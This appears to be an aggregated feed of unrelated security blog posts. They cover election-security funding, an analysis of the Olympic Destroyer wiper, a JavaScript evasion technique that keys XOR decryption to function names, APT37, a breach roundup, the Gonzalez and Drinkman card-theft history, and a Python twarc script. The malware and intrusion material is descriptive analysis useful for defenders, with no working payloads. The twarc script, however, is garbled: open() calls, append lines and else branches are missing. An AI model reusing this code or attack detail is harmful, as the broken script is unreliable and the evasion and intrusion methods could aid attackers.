One of the biggest issues in tackling election hacking is the sheer logistics of U.S. elections. The United States doesn’t have one large national “election system”; it has a patchwork of thousands of mini election systems overseen by individual states and local authorities. Some states have hundreds, even thousands of local election agencies; The Washington Post reports that Wisconsin alone has 1,800. To its credit, Wisconsin has encrypted its database and would like to implement multi-factor authentication. However, this would require election employees to have a second device, such as a cell phone, to log in – and not all of them have work-issued phones or even high-speed internet access.

Not surprisingly, funding is also a stumbling block. Even prior to the 2016 elections, cyber security experts were imploring states to ensure that all of their polling places were using either paper ballots with optical scanners or electronic machines capable of producing paper audit trails. However, as we head toward the midterms, five states are still using electronic machines that do not produce audit trails, and another nine have at least some precincts that still lack paper ballots or audit trails. The problem isn’t that these states don’t want to replace their antiquated systems or hire cyber security experts to help them; they simply don’t have the budget to do so.

Congress Must Act to Prevent Election Hacking

Several bills that would appropriate more money for states to secure their systems against election hacking are pending before Congress, including the Secure Elections Act. Congress can also release funding that was authorized by the 2002 Help America Vote Act, but never appropriated.

The integrity of our elections is the cornerstone of our nation’s democracy. Proactive cyber security measures can prevent election hacking, but states cannot be expected to go it alone; cyber attacks do not respect borders.

The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.

Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.

The post States Worry About Election Hacking as Midterms Approach appeared first on .

Olympic Destroyer: A new Candidate in South Korea

Authored by: Alexander Sevtsov
Edited by: Stefano Ortolani

A new malware has recently made the headlines, targeting several computers during the opening ceremony of the Olympic Games Pyeongchang 2018. While Cisco Talos group, and later Endgame, have recently covered it, we noticed a couple of interesting aspects not previously addressed, we would like to share: its taste for hiding its traces, and the peculiar decryption routine. We also would like to pay attention on how the threat makes use of multiple components to breach the infected system. This knowledge allows us to improve our sandbox to be even more effective against emerging advanced threats, so we would like to share some of them.

The Olympic Destroyer

The malware is responsible for destroying (wiping out) files on network shares, making infected machines irrecoverable, and propagating itself with the newly harvested credentials across compromised networks.

To achieve this, the main executable file (sha1: 26de43cc558a4e0e60eddd4dc9321bcb5a0a181c) drops and runs the following components, all originally encrypted and embedded in the resource section:

  • a browsers credential stealer (sha1: 492d4a4a74099074e26b5dffd0d15434009ccfd9),
  • a system credential stealer (a Mimikatz-like DLL – sha1: ed1cd9e086923797fe2e5fe8ff19685bd2a40072 (for 64-bit OS), sha1: 21ca710ed3bc536bd5394f0bff6d6140809156cf (for 32-bit OS)),
  • a wiper component (sha1: 8350e06f52e5c660bb416b03edb6a5ddc50c3a59).
  • a legitimate signed copy of the PsExec utility used for the lateral movement (sha1: e50d9e3bd91908e13a26b3e23edeaf577fb3a095)

A wiper deleting data and logs

The wiper component is responsible for wiping the data from the network shares, but also destroying the attacked system by deleting backups, disabling services (Figure 1), clearing event logs using wevtutil, thereby making the infected machine unusable. The very similar behaviors have been previously observed in other Ransomware/Wiper attacks, including the infamous ones such as BadRabbit and NotPetya.

Disabling Windows services

Figure 1. Disabling Windows services

After wiping the files, the malicious component sleeps for an hour (probably, to be sure that the spawned thread managed to finish its job), and calls the InitiateSystemShutdownExW API with the system failure reason code (SHTDN_REASON_MAJOR_SYSTEM, 0x00050000) to shut down the system.

An unusual decryption to extract the resources

As mentioned before, the executables are stored encrypted inside the binary’s resource section. This is to prevent static extraction of the embedded files, thus slowing down the analysis process. Another reason of going “offline” (compared with e.g. the Smoke Loader) is to bypass any network-based security solutions (which, in turn, decreases the probability of detection). When the malware executes, they are loaded via the LoadResource API, and decrypted via the MMX/SSE instructions sometimes used by malware to bypass code emulation, this is what we’ve observed while debugging it. In this case, however, the instructions are used to implement AES encryption and MD5 hash function (instead of using standard Windows APIs, such as CryptEncrypt and CryptCreateHash) to decrypt the resources. The MD5 algorithm is used to generate the symmetric key, which is equal to MD5 of a hardcoded string “123”, and multiplied by 2.

The algorithms could be also identified by looking at some characteristic constants of

  1. The Rcon array used during the AES key schedule (see figure 2) and,
  2. The MD5 magic initialization constants.

The decrypted resources are then dropped in temporary directory and finally, executed.

Figure 2. AES key setup routine for resources decryption


An interesting aspect of the decryption is its usage of the SSE instructions. We exploited this peculiarity and hunted for other samples sharing the same code by searching for the associated codehash, for example. The later is a normalized representation of the code mnemonics included in the function block (see Figure 3) as produced by the Lastline sandbox, and exported as a part of the process snapshots).

Another interesting sample found during our investigation was (sha1: 84aa2651258a702434233a946336b1adf1584c49) with the harvested system credentials belonging to the Atos company, a technical provider of the Pyeongchang games (see here for more details).

Hardcoded credentials of an Olympic Destroyer targeted the ATOS company

Figure 3. Hardcoded credentials of an Olympic Destroyer targeted the ATOS company

A Shellcode Injection Wiping the Injector

Another peculiarity of the Olympic Destroyer is how it deletes itself after execution. While self-deletion is a common practice among malware, it is quite uncommon to see the injected shellcode taking care of it: the shellcode, once injected in a legitimate copy of notepad.exe, waits until the sample terminates, and then deletes it.

Checking whether the file is terminated or still running

Figure 4. Checking whether the file is terminated or still running

This is done first by calling CreateFileW API and checking whether the sample is still running (as shown in Figure 4); it then overwrites the file with a sequence of 0x00 byte, deletes it via DeleteFileW API, and finally exits the process.

The remainder of the injection process is very common and it is similar to what we have described in one of our previous blog posts: the malware first spawns a copy of notepad.exe by calling the CreateProcessW function; then allocates memory in the process by calling VirtualAllocEx, and writes shellcode in the allocated memory through WriteProcessMemory. Finally, it creates a remote thread for its execution via CreateRemoteThread.

Shellcode injection in a copy of notepad.exe

Figure 5. Shellcode injection in a copy of notepad.exe

Lastline Analysis Overview

Figure 6 shows how the analysis overview looks like when analyzing the sample discussed in this article:

Analysis overview of the Olympic Destroyer

Figure 6. Analysis overview of the Olympic Destroyer


In this article, we analyzed a variant of the Olympic Destroyer, a multi-component malware that steals credentials before making the targeted machines unusable by wiping out data on the network shares, and deleting backups. Additionally, the effort put into deleting its traces shows a deliberate attempt to hinder any forensic activity. We also have shown how Lastline found similar samples related to this attack based on an example of the decryption routine, and how we detect them. This is a perfect example of how the threats are continuously improving making them even stealthier, more difficult to extract and analyze.

Appendix: IoCsdivider-2-white

Olympic Destroyer
26de43cc558a4e0e60eddd4dc9321bcb5a0a181c (sample analyzed in this article)

The post Olympic Destroyer: A new Candidate in South Korea appeared first on Lastline.

Control Flow Integrity: a Javascript Evasion Technique

Understanding the real code behind a Malware is a great opportunity for Malware analysts, it would increase the chances to understand what the sample really does. Unfortunately it is not always possible figuring out the "real code", sometimes the Malware analyst needs to use tools like disassemblers or debuggers in order to guess the real Malware actions. However when the Sample is implemented by "interpreted code" such as (but not limited to): Java, Javascript, VBS and .NET there are several ways to get a closed look to the "code”.

Unfortunately attackers know what the analysis techniques are and often they implement evasive actions in order to reduce the analyst understanding or to make the overall analysis harder and harder. An evasive technique could be implemented to detect if the code runs over a VM or it could be implemented in order to run the code only on given environments or it could be implemented to avoid debugging connectors or again to evade reverse-engineering operations such as de-obfuscations techniques. Today "post" is about that, I'd like to focus my readers attention on a fun and innovative way to evade reverse-engineering techniques based on Javascript technology.

Javascript is getting day-by-day more important in term of attack vector, it is often used as a dropper stage and its implementation is widely influenced by many flavours and coding styles but as a bottom line, almost every Javascript Malware is obfuscated. The following image shows an example of obfuscated javascript payload (taken from one analysis of mine).

Example: Obfuscated Javascript

As a first step the Malware analyst would try to de-obfuscate such a code by getting into it. Starting from simple "cut and paste" to more powerful "substitution scripts" the analyst would try to rename functions and variables in order to split complexity and to make clear what code sections do. But in Javascript there is a nice way to get the callee function name which could be used to understand if a function name changed over the time. That function is the arguments.callee.caller. By using that function the attacker can create a stack trace where it saves the executed function chaining name list. The attacker would grab function names and use them as the key to dynamically decrypt specific and crafted Javascript code. Using this technique the Attacker would have an implicit control flow integrity because if a function is renamed or if the function order is slightly different from the designed one, the resulting "hash" would be different. If the hash is different the generated key would be different as well and it wont be able to decrypt and to launch specific encrypted code.

But lets take a closer look to what I meant. The following snip shows a clear (not obfuscated) example explaining this technique. I decided to show not obfuscated code up here just to make it simple.

Each internal stage evaluates ( eval() ) a content. On row 21 and 25 the function cow001 and pyth001 evaluates xor decrypted contents. The xor_decrypt function takes two arguments: decoding_key and the payload to be decrypted. Each internal stage function uses as decryption key the name of callee by using the function. If the function name is the "designed one" (the one that the attacker used to encrypt the payload) the encrypted content would be executed with no exceptions. On the other side if the function name is renamed (by meaning has been changed by the analyst for his convenience) the evaluation function would fail and potentially the attacker could trigger a different code path (by using a simple try and catch statement). 

Before launching the Sample in the wild the attacker needs to prepare the "attack path" by developing the malicious Javascript and by obfuscating it. Once the obfuscation took place the attacker needs to use an additional script (such as the following one) to encrypt the payloads according to the obfuscated function names and to replace the newly encrypted payload to the final and encrypted Javascipt file replacing the encrypted payloads with the one encrypted having as a key the encrypted function names.

The attacker is now able to write a Javascript code owning its own control flow. If the attacker iterates such a concept over and over again,  he would block or control the code execution by hitting a complete reverse-engineering evasion technique.
Watch it out and be safe !

APT37 (Reaper): The Overlooked North Korean Actor

On Feb. 2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).

Our analysis of APT37’s recent activity reveals that the group’s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123.

Read our report, APT37 (Reaper): The Overlooked North Korean Actor, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:

  • Targeting: Primarily South Korea – though also Japan, Vietnam and the Middle East – in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.
  • Initial Infection Tactics: Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.
  • Exploited Vulnerabilities: Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.
  • Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.
  • Malware: A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.

More information on this threat actor is found in our report, APT37 (Reaper): The Overlooked North Korean Actor. You can also register for our upcoming webinar for additional insights into this group.

It’s Five O’Clock Somewhere – Business Security Weekly #74

This week, Michael and Paul interview Joe Kay, Founder & CEO of Enswarm! In the Tracking Security Information segment, IdentityMind Global rasied $10M, DataVisor raised $40M, & Infocyte raised $5.2M! Last but not least, our second feature interview with Sean D'Souza, author of The Brain Audit! All that and more, on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Weekly Cyber Risk Roundup: Olympic Malware and Russian Cybercrime

More information was revealed this week about the Olympic Destroyer malware and how it was used to disrupt the availability of the Pyeonchang Olympic’s official website for a 12-hour period earlier this month.

It appears that back in December, a threat actor may have compromised the computer system’s of Atos, an IT service provider for the Olympics, and then used that  access to perform reconnaissance and eventually spread the destructive wiper malware known as “Olympic Destroyer.”

The malware was designed to delete files and event logs by using legitimate Windows features such as PsExec and Windows Management Instrumentation, Cisco researchers said.

Cyberscoop reported that Atos, which is hosting the cloud infrastructure for the Pyeongchang games, was compromised since at least December 2017, according to VirusTotal samples. The threat actor then used stolen login credentials of Olympics staff in order to quickly propagate the malware.

An Atos spokesperson confirmed the breach and said that investigations into the incident are continuing.

“[The attack] used hardcoded credentials embedded in a malware,” the spokesperson said. “The credentials embedded in the malware do not indicate the origin of the attack. No competitions were ever affected and the team is continuing to work to ensure that the Olympic Games are running smoothly.”

The Olympic Destroyer malware samples on VirusTotal contained various stolen employee data such as usernames and passwords; however, it is unclear if that information was stolen via a supply-chain attack or some other means, Cyberscoop reported.


Other trending cybercrime events from the week include:

  • Organizations expose data: Researchers discovered a publicly exposed Amazon S3 bucket belonging to Bongo International LLC, which was bought by FedEx in 2014, that contained more than 119 thousand scanned documents of U.S. and international citizens. Researchers found a publicly exposed database belonging to The Sacramento Bee that contained information on all 19 million registered voters in California, as well as internal data such as the paper’s internal system information, API information, and other content. Researchers discovered a publicly exposed network-attached storage device belonging to the Maryland Joint Insurance Association that contained a variety of sensitive customer information and other credentials. The City of Thomasville said that it accidentally released the Social Security numbers of 269 employees to someone who put in a public record request for employee salaries, and those documents were then posted on a Facebook page.
  • Notable phishing attacks: The Holyoke Treasurer’s Office in Massachusetts said that it lost $10,000 due to a phishing attack that requested an urgent wire payment be processed. Sutter Health said that a phishing attack at legal services vendor Salem and Green led to unauthorized access to an employee email account that contained personal information for individuals related to mergers and acquisitions activity. The Connecticut Airport Authority said that employee email accounts were compromised in a phishing attack and that personal information may have been compromised as a result.
  • User and employee accounts accessed: A phishing attack led to more than 50,000 Snapchat users having their credentials stolen, The Verge reported. A hacker said that it’s easy to brute force user logins for Freedom Mobile and gain access to customers’ personal information. Entergy is notifying employees of a breach of W-2 information via its contractor’s website TALX due to unauthorized individuals answering employees’ personal questions and resetting PINs.
  • Other notable events: Makeup Geek is notifying customers of the discovery of malware on its website that led to the theft of personal and financial information entered by visitors over a two-week period in December 2017. The Russian central bank said that hackers managed to steal approximately $6 million from a Russian bank in 2017 in an attack that leveraged the SWIFT messaging system. Western Union is informing some customers of a third-party data breach at “an external vendor system formerly used by Western Union for secure data storage” that may have exposed their personal information.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresThe U.S. government issued a formal statement this past week blaming the Russian military for the June 2017 outbreak of NotPetya malware. Then on Friday, the day after the NotPetya accusations, the Justice Department indicted 13 Russian individuals and three Russian companies for using information warfare to interfere with the U.S. political system, including the 2016 presidential election. Those stories have once again pushed the alleged cyber activities of the Russian government into the national spotlight.

A statement on NotPetya from White House Press Secretary Sarah Huckabee Sanders described the outbreak as “the most destructive and costly cyber-attack in history” and vowed that the “reckless and indiscriminate cyber-attack … will be met with international consequences.” Newsweek reported that the NotPetya outbreak, which leveraged the popular Ukrainian accounting software M.E. Doc to spread, cost companies more than $1.2 billion. The United Kingdom also publicly blamed Russia for the attacks, writing in a statement that “malicious cyber activity will not be tolerated.” A spokesperson for Russian President Vladimir Putin denied the allegations as “the continuation of the Russophobic campaign.”

It remains unclear what “consequences” the U.S. will impose in response to NotPetya. Politicians are still urging President Trump to enforce sanctions on Russia that were passed with bipartisan majorities in July. Newsday reported that congressmen such as democratic Sen. Chuck Schumer and republican representative Peter King have urged those sanctions to be enforced following Friday’s indictment of 13 Russians and three Russian companies.

The indictment alleges the individuals attempted to “spread distrust” towards U.S. political candidates and the U.S. political system by using stolen or fictitious identities and documents to impersonate politically active Americans, purchase political advertisements on social media platforms, and pay real Americans to engage in political activities such as rallies. For example, the indictment alleges that after the 2016 presidential election, the Russian operatives staged rallies both in favor of and against Donald Trump in New York on the same day in order to further their goal of promoting discord.

As The New York Times reported, none of those indicted have been arrested, and Russia is not expected to extradite those charged to the U.S. to face prosecution. Instead, the goal is to name and shame the operatives and make it harder for them to work undetected in future operations.

Drinkman and Smilianets Sentenced: The End to Our Longest Databreach Saga?

On Thursday, February 15, 2018, we may have finally reached the end of the Albert Gonzalez Databreach Saga.  Vladimir Drinkman, age 37, was sentenced to 144 months in prison, after pleading guilty before U.S. District Judge Jerome Simandle in New Jersey.  His colleague, Dmitriy Smilianets, age 34, had also pleased guilty and was sentenced to 51 months and 21 days in prison (which is basically "time served", so he'll walk immediately).  The pair were actually arrested in the Netherlands on June 28, 2012, and the guilty pleas had happened in September 2015th after they were extradited to New Jersey.

Those who follow data breaches will certainly be familiar with Albert Gonzalez, but may not realize how far back his criminal career goes.

On July 24, 2003, the NYPD arrested Gonzalez in front of a Chase Bank ATM at 2219 Broadway found Gonzalez in possession of 15 counterfeit Chase ATM cards and $3,000 in cash. (See case 1:09-cr-00626-JBS).  After that arrest, Gonzalez was taken under the wing of a pair of Secret Service agents, David Esposito and Steve Ward.  Gonzalez describes some of the activities he engaged in during his time as a CI in his 53 page appeal that he files March 24, 2011 from his prison cell in Milan, Michigan.

At one point, he claims that he explained to Agent Ward that he owed a Russian criminal $5,000 and he couldn't afford to pay it.  According to his appeal, he claims Ward told him to "Go do your thing, just don't get caught" and that Agent Ward later asked him if he had "handled it." Because of this, Gonzalez (who again, according to his own sentencing memo, likely has Asperger's) claims he believed that he had permission to hack, as long as he didn't get caught.

Over Christmas 2007, Gonzalez and his crew hacked Heartland Payments Systems and stole around 130 million credit and debit cards.  He was also charged with hacking 7-Eleven (August 2007), Hannaford Brothers (November 2007) where he stole 4.2 million credit and debit cards. Two additional data breaches against "Company A" and "Company B" were also listed as victims.  In Gonzalez's indictment, it refers to "HACKER 1 who resided in or near Russia" and "HACKER 2 who resided in or near Russia."  Another co-conspirator "PT" was later identified as Patrick Toey, a resident of Virginia Beach, VA.  (Patrick Toey's sentencing memorandum is a fascinating document that describes his first "Cash out trip" working for Albert Gonzalez in 2003. Toey describes being a high school drop out who smoked marijuana and drank heavily who was "put on a bus to New York" by his mother to do the cash out run because she needed rent money.  Toey later moved in with Gonzalez in Miami, where he describes hacking Forever 21 "for Gonzalez" among other hacks.

Gonzalez's extracurricular activities caught up with him when Maksym Yastremskiy (AKA Maksik) was arrested in Turkey.  Another point of Gonzalez's appeal was to say that Maksik was tortured by Turkish police, and that without said torture, he never would have confessed, which would have meant that Gonzalez (then acting online as "Segvec") would never have been identified or arrested.  Gonzalez claims that he suffered from an inadequate defense, because his lawyer should have objected to the evidence "obtained under torture."  These charges against Gonzalez were tried in the Eastern District of New York (2:08-cr-00160-SJF-AKT) and proved that Gonzalez was part of the Dave & Buster's data breach

On December 15, 2009, Gonzalez tried to shrug off some of his federal charges by filing a sentencing memo claiming that he lacked the "capacity to knowingly evaluate the wrongfulness of his actions" and asserting that his criminal behavior "was consistent with description of the Asperger's discorder" and that he exhibited characteristics of "Internet addiction."  Two weeks later, after fighting that the court could not conduct their own psychological exam, Gonzalez signed a guilty plea, agreeing that the prosecutor would try to limit his sentence to 17 years. He is currently imprisoned in Yazoo, Mississippi (FBOP # 25702-050) scheduled to be released October 29, 2025.

Eventually "HACKER 1" and "HACKER 2" were indicted themselves in April 2012, with an arrest warrant issued in July 2012, but due to criminals still at large, the indictment was not unsealed until December 18, 2013. HACKER 1 was Drinkman.  HACKER 2 was Alexandr Kalinin, who was also indicted with Drinkman and Smilianets.

Shortly after the Target Data Breach, I created a presentation called "Target Data Breach: Lessons Learned" which drew heavily on the history of Drinkman and Smilianets. Some of their documented data breaches included:
NASDAQMay 2007  loss of control
7-ELEVEN August 2007
Carrefour October 2007 2 million cards
JCPenneyOctober 2007
HannafordNovember 2007 4.2 million cards
Wet SealJanuary 2008
CommideaNovember 2008 30 million cards
Dexia Bank BelgiumFeb'08-Feb'09
Jet BlueJan'08 to Feb '11
Dow Jones2009
EuroNetJul '10 to Oct '11  2 million cards
Visa JordanFeb-Mar '11  800,000 cards
Global Payments SystemsJan '11 to Mar '12
Diners Club SingaporeJun '11
IngenicardMar '12 to Dec '12

During the time of these attacks, Dimitry Smilianets was also leading the video game world.  His team, The Moscow 5, were the "Intel Extreme Masters" champions in the first League of Legends championship, also placing in the CounterStrike category.   Smilianets turned out not to be the hacker, but rather specialized in selling the credit cards that the other team members stole.  Steal a few hundred million credit cards and you can buy a nice gaming rig!

Smilianets with his World Champion League of Legends team in 2012

 How did these databreaches work?

Lockheed Martin's famous paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" laid out the phases of an attack like this:

But my friend Daniel Clemens had explained these same phases to me when he was teaching me the basics of Penetration Testing years before when he was first starting Packet Ninjas!

1. External Recon - Gonzalez and his crew scan for Internet-facing SQL servers
2. Attack (Dan calls this "Establishing a Foothold") - using common SQL configuration weaknesses, they caused a set of additional tools to be downloaded from the Internet
3. Internal Recon - these tools included a Password Dumper, Password Cracker, Port Scanner,  and tools for bulk exporting data
4. Expand (Dan calls this "Creating a Stronghold")  - usually this consisted with monitoring the network until they found a Domain Admin userid and password.  (for example, in the Heartland Payments attack, the VERITAS userid was found to have the password "BACKUP" which unlocked every server on the network!
5. Dominate - Gonzalez' crew would then schedule an SQL script to run a nightly dump their card data
6. Exfiltrate - data sent to remote servers via an outbound FTP.

In Rolling Stone, Gonzalez claims he compromised more than 250 networks
In the Rolling Stone article, "Sex, Drugs, and the Biggest Cybercrime of All Time" , Steven Watt, who was charged in Massachusetts for providing attack tools to Gonzalez in October 2008.  Watt's tools were used in breaches, including BJ's Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, and OfficeMax.  As part of his sentencing, Watt was ordered to repay $171.5 Million dollars.

Almost all of those databreaches followed the same model ... scan, SQL Inject, download tools, plant a foothold, convert it to a stronghold by becoming a domain admin, dominate the network, and exfiltrate the data. 

How did the TARGET Data breach happen, by the way?  Target is still listed as being "Unsolved" ...   but let's review.  An SQL injection led to downloaded tools, (including NetCat, PSExec, QuarksPWDump, ElcomSoft's Proactive Password Auditor, SomarSoft's DumpSec, Angry IP Scanner (for finding database servers), and Microsoft's OSQL and BCP (Bulk Copy)), a Domain Admin password was found (in Target's case, a BMC server monitoring tool running the default password), the POS Malware was installed, and data exfiltration begun. 

Sound familiar???


With most of Gonzalez's crew in prison by 2010, the data breaches kept right on coming, thanks to Drinkman and Smilianets. 

Drinkman, the hacker, was sentenced to 144 months in prison.
Smilianets, the card broker, was sentenced to 51 months and 21 days, which was basically "time served" -- he was extradited to the US on September 7, 2012, so he'll basically walk.

Will Smilianets return to video gaming? to money laundering? or perhaps choose to go straight?

Meanwhile, Alexandr Kalinin, of St. Petersburg, Russia; Mikhail Rytikov, of Odessa, Ukraine; and Roman Kotov, of Moscow, Russia, are all still at large.  Have they learned from the fate of their co-conspirators? or are they in all likelihood, scanning networks for SQL servers, injecting them, dropping tools, planting footholds, creating strongholds, and exfiltrating credit card data from American companies every day?

Kalinin (AKA Grig, AKA "g", AKA "tempo") is wanted for hacking NASDAQ and planting malware that ran on the NASDAQ networks from 2008 to 2010.  (See the indictment in the Southern District of New York, filed 24JUL2013 ==> 1:13-cr-00548-ALC )

Mykhailo Sergiyovych Rytikov is wanted in the Western District of Pennsylvania for his role in a major Zeus malware case.  Rytikov leased servers to other malware operators.  Rytikov is also indicted in the Eastern District of Virginia along with Andriy DERKACH for running a "Dumps Checking Service" that processed at least 1.8 million credit cards in the first half of 2009 and that directly led to more than $12M in fraud.  ( 1:12-cr-00522-AJT filed 08AUG2013.)  Rytikov did have a New York attorney presenting a defense in the case -- Arkady Bukh argues that while Rytikov is definitely involved in web-hosting, he isn't responsible for what happens on the websites he hosts.

Roman Kotov, and Rytikov and Kalinin, are still wanted in New Jersey as part of the case 1:09-cr-00626-JBS (Chief Judge Jerome B. Simandle ). This is the same case Drinkman and Smilianets were just sentenced under.

It’s Just Beautiful – Application Security Weekly #06

This week, Keith and Paul discuss Data Security and Bug Bounty programs! In the news, Lenovo warns of critical Wifi vulnerability, Russian nuclear scientists arrested for Bitcoin mining plot, remote workers outperforming office workers, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, this is useful enough if we’re looking for fresh information on a topic.

Since this methodology is so simple, posting code for a tool that simply prints the resulting tweets to stdout would make for a boring blog post. Here I present a tool that collects a bunch of metadata from the returned Tweet objects. Here’s what it does:

  • records frequency distributions of URLs, hashtags, and users
  • records interactions between users and hashtags
  • outputs csv files that can be imported into Gephi for graphing
  • downloads all images found in Tweets
  • records each Tweet’s text along with the URL of the Tweet

The code doesn’t really need explanation, so here’s the whole thing.

from collections import Counter
from itertools import combinations
from twarc import Twarc
import requests
import sys
import os
import shutil
import io
import re
import json

# Helper functions for saving json, csv and formatted txt files
def save_json(variable, filename):
  with, "w", encoding="utf-8") as f:
    f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def save_csv(data, filename):
  with, "w", encoding="utf-8") as handle:
    for source, targets in sorted(data.items()):
      for target, count in sorted(targets.items()):
        if source != target and source is not None and target is not None:
          handle.write(source + u"," + target + u"," + unicode(count) + u"\n")

def save_text(data, filename):
  with, "w", encoding="utf-8") as handle:
    for item, count in data.most_common():
      handle.write(unicode(count) + "\t" + item + "\n")

# Returns the screen_name of the user retweeted, or None
def retweeted_user(status):
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        return user["screen_name"]

# Returns a list of screen_names that the user interacted with in this Tweet
def get_interactions(status):
  interactions = []
  if "in_reply_to_screen_name" in status:
    replied_to = status["in_reply_to_screen_name"]
    if replied_to is not None and replied_to not in interactions:
  if "retweeted_status" in status:
    orig_tweet = status["retweeted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
          if hashtag is not None and hashtag not in hashtags:
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
      if "urls" in entities:
        for item in entities["urls"]:
          if item is not None and "expanded_url" in item:
            url = item['expanded_url']
            if url is not None and url not in urls:
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if (len(sys.argv) > 1):
    target_list = sys.argv[1:]
    print("No search terms provided. Exiting.")

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in
# Output some status as we go, so we know something is happening
      sys.stdout.write("Collected " + str(tweet_count) + " tweets.")
      tweet_count += 1
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if "id_str" is not None and "screen_name" is not None:
        tweet_url = "" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
        if interactions is not None:
          for user in interactions:
            mentioned_frequency_dist[user] += 1
            if screen_name not in user_user_graph:
              user_user_graph[screen_name] = {}
            if user not in user_user_graph[screen_name]:
              user_user_graph[screen_name][user] = 1
              user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
                hashtag_hashtag_graph[item1][item2] += 1
          for hashtag in hashtags:
            hashtag_frequency_dist[hashtag] += 1
            if screen_name not in user_hashtag_graph:
              user_hashtag_graph[screen_name] = {}
            if hashtag not in user_hashtag_graph[screen_name]:
              user_hashtag_graph[screen_name][hashtag] = 1
              user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
